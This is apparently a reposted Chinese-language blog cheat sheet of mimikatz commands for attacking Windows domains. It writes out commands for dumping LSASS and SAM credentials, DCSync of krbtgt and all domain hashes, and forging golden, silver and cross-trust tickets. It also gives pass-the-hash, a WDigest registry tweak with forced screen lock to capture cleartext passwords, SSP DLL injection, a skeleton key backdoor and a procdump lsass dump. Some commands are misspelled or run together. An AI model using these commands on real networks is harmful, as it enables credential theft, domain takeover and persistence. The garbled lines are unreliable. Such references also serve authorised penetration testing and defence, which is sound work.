前言
在管理员权限下使用,如果没有管理员权限,基本每个功能都无法正常使用,切记。
::命令可以查看帮助信息
普通管理员权限可以执行的命令(密码查询与权限检测与日志记录)
lsadump::lsa /inject 查看ntds.dit与sam文件的信息,如果没有查看ntds.dit的就只查看sam
privilege::debug 打开第一个命令,且必须执行。
log 将这条命令执行后的所谓有输出存在当前目录下的mimikatz.log文件中。
sekurlsa::logonpasswords 列出已登陆用户的密码(比较常用)
域控权限才能执行的命令
lsadump::dcsync /domain:test.com /user:krbtgt 输出指定用户的密码信息 lsadump::dcsync /domain:test.com /all /csv 列出域内所有用户的账号密码
黄金票据相关
清除与查询票据信息
kerberos::list 列出说所有票据kerberos::purge 删除所有票据
sekurlsa::kerberos 列出已被验证的kerberos凭证(几乎没用过且只能在域内使用)
sekurlsa::tickets /export 列出所有票据(基本没用过且只能在域内用)
制作票据
使用nthash制作票据
kerberos::golden /user:Administrator /domain:test.com /sid:S-1-5-21-4166986646-4168497534-2490551922 /krbtgt:308390d1ca7addf22c84ba9f1d26cbe4 /ticket:1.kirbi
使用krbtgt的hash值:
kerberos::gloden /user:Administrator /domain:xxx.xxx.xxx /sid:xxxxxxxxxxxxx krbtgt:ntlm-hashvlaue /ticket:test.kribi
使用krbtgt的aes256值:
kerberos::gloden /domain:xxx.xxx /sid:xxxxxxxxxxx /aes256:xxxxxxxx /user:Administrator /ticket:test.kribi
pth攻击:
sekurlsa::pth /user:Administrator /domain:test.com /ntlm:3dbde697d71690a769204beb12283678lsadump::dcsync /domain:test.com /all /csv
加载票据到缓存
kerberos::ptt 1.kirbi
破解sam文件
lsadump::sam /sam:sam.hiv /system:system.hiv
明文密码抓取
读取windows明文密码思路
1.修改注册表让mimikatz可以读取明文密码,然后使用cmd锁屏让用户重新登陆。 #开启wdigest Auth读取明文密码
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
强制锁屏
rundll32 user32.dll,LockWorkStation
读取密码
mimikatz.exe log privilege::Debug sekurlsa::logonpasswords exittype mimikatz.log | find /i "password"
2.使用mimikatz的ssp,然后使用cmd让屏幕锁屏。
copy mimilib1.dll C:WindowsSystem32reg add "HKEY_LOCAL_MACHINESystemCurrentControlSetControlLsa" /v "Security Packages" /d "C:WindowsSystem32mimilib1.dll" /t REG_MULTI_SZ /mimikatz.exe privilege::debug misc::memssp exitrundll32 user32.dll,LockWorkStationtype C:WindowsSystem32mimilsa.log
制作白银票据
kerberos::golden /user:administrator /domain:wlaq.com /sid:S-1-5-21-4207138187-2036730068-1601168572 /target:dc01.wlaq.com /rc4:a5974b890979d0d0ff123262b14449d1 /service:cifs /ptt
制作一个跨信任域的黄金票据
-
当前域的krbtgt密码 -
Enterprise Admins组任意用户的sid -
域之间互相信任。 -
当前域的sid。
mimikatz.exe "kerberos::golden /user:anyusername sids:[EA组的sid] /sid:[lab.adsec.com域的sid] /domain:lab.adsec.com /krbtgt:16ed27ee7848756cfa96b33c25e3ad3d /ptt"exit
Get-ADGroup -Identity “Enterprise Admins” #查询EA组的sid
查询域内所有的组
ldapsearch -LLL -x -H ldap://172.24.6.11:389 -D “username” -w “password” -b CN=Users,DC=first,DC=test,DC=com “(objectClass=group)”|grep “sAMAccountName”
#查准Enterprise Admins组中有谁 ldapsearch -LLL -x -H ldap://172.24.6.11:389 -D “username” -w “password” -b CN=“Enterprise Admins”,CN=Users,DC=first,DC=test,DC=com | grep “member”
查询组内用户的sid
ldapsearch -LLL -x -H ldap://172.24.6.11:389 -D “username” -w “password” -b "CN=Administrator,CN=Users,DC=first,DC=test,DC=com " | grep objectSid 这个查出来的是乱码,看似是base64但是无法解密。
可以使用powerview或者adfind获取用户的sid。 使用skeleton key进行权限维持与恢复cmd禁用 1.skeleton key设置,这样子域内任意用户相当于都有了双重密码,除原密码外,mimikatz这个密码也可以进行登录。
privilege::debugmisc::skeleton
2.恢复被禁用的cmd等命令 有时候域管理员会禁用cmd等命令,这时候我们可以使用mimikatz进行恢复
privilege::debugmisc::cmdmisc::regeditmisc::taskmgr
补充
procdump
拉出lsass的内存并保存成文件
procdump.exe -accepteula -ma lsass.exe lsass.dmp
破解内存中的密码
sekurlsa::minidump lass.dmpsekurlsa::logonpasswords
原文地址:https://blog.csdn.net/qq_41874930/article/details/108266353
原文始发于微信公众号(富贵安全):mimikatz(猕猴桃)常用命令总结
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论